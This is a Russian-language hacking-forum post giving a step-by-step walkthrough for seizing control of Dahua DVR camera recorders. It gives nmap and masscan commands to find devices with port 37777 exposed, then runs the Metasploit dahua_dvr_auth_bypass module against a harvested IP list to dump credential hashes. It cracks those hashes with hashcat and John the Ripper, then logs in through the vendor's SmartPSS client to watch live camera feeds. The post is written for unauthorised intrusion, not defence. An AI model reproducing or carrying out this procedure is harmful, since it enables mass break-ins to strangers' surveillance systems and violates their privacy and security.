• XSS.stack #1 – первый литературный журнал от юзеров форума

Взлом DVR Dahua

Kevin Shindel

HDD-drive
Пользователь
Регистрация
04.02.2019
Сообщения
31
Реакции
24
Сегодня я вам поведаю как подчинить под свой контроль регистраторы фирмы DAHUA.

Для начала нам нужны след. иснтрументы.
+ nmap
+ metasploit
+ john the ripper
+ Dahua SmartPSS (скачать можно с офф.сайта)

Сначала нам нужно найти собственно сами регистраторы в вебе. Если вы хоть раз настраивали регистратор то знаете что для корректной работы, нужно пробрасывать порт 37777 и 80.
80 порт необходим для просмотра виедфайлов\архива с помощью браузера (так как 80 порт используется для настройки роутера, часто его меняют на 8080,1080, или 81)
37777 порт для проприетарного софта.

Итак искать мы будем открытый порт 37777 (потом обьясню почему не 80 и 8080)

Итак запускаем nmap\masscan для поиска.

команда для нмапа следующая:
root@kali: nmap -n -Pn -T4 -sS -p37777 --open 192.168.1.0/24 -oG 37777_open.txt

если у вас есть список ИПов в стандарте CIRD

если по религиозным убеждениям используете масскан тогда печатайте так...
root@kali: masscan --rate=500 -p37777 192.168.1.0/24 -oG 37777.txt

можно сканировать из внешнего файла
root@kali: nmap -n -Pn -T4 -sS -p37777 --open -iL /home/file.txt -oG 37777_open.txt
для масскана аналогично
root@kali: masscan --rate=500 -p37777 -iL /home/file.txt -oG 37777.txt

После скана нужно "почистить" файлы, оставить только голые ИПы иначе метасплойт пошлёт на йух.

root@kali: cat 37777.txt | sort | uniq > 37777_clear.txt

Окей... мы насканили допустим 30-40 регистраторов, запускаем метасплойт.

root@kali: service postgresql start
root@kali: msfconsole
root@kali: use auxiliary/scanner/misc/dahua_dvr_auth_bypass


дальше сканер нужно настроить....

root@kali: set ACTION USER
root@kali: set THREADS 25


теперь маленькая хитрость, что бы не вбивать ипы вручную просто скормим весь файл метайслойт через спец.строку

root@kali: set RHOSTS file:37777_clear.txt

ждём....

После того как сканер закончил свою работу, копируем лут и сохраняем в тесктовый файл.
Мы получили логины и пароли в зашифрованом виде ( не переживайте крипт там очень простой "Dahua [MD5 32/64]" )
(Однако недавно обратил внимание что DAHUA начала использовать хэш MD5, если таковой появится в выводе метасплойт то его возможно сбрутить через кота)

root@kali: hashcat -m 0 -a 0 hash.txt -o cracked[.]txt /home/wordlist.txt

Копируем хэши в отдельный файл и готовим для брута Джоном, для кота я не нашел подержки.

допустим наш хэш "4WzwxXxm" нужно добавить перед ним префикс $dahua$, хэш будет иметь вид $dahua$4WzwxXxm и скармливаем Джону.

root@kali: john hash.txt

Если пароль не сложный то он быстро найдётся (по собственному опыту на регистраторе минимум 2-4 учётки а то и больше и взламывается сразу почти все)
После удачного брута проверяем пароли...

root@kali: john hash.txt --show

После того как мы подобрали пасс можно поступить двумя способами...
Просканить данный ИП на наличие проброшеного порта регистратора (если таковой имеется) и зайти через ВЕБ или ...
Если есть WIN под рукой установить оригинальный софт от производителя DAHUA PSS.
сцыль "http://ru.dahuasecurity.com/ru/download_2.html"

я скачивал версию "Smart_PSS_International_IS_V2.00.1.R.20170225"


Устанавливаем софт, во время первого запуска он потребует установить пароль... указываем любой... 1234 \ 0000 не важно. (просто в качестве меры безопасности)
Ставим галку сохранить пароль и больше он запрашивается не будет.






Далее идём во вкладку HOME PAGE -> DEVICES



Жмём ADD, и указываем необходимые данные и жмём еще раз ADD.



Переходим обратно в главное меню, выбираем LIVEVIEV и раскрываем список камер справа...



Пруф )

 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх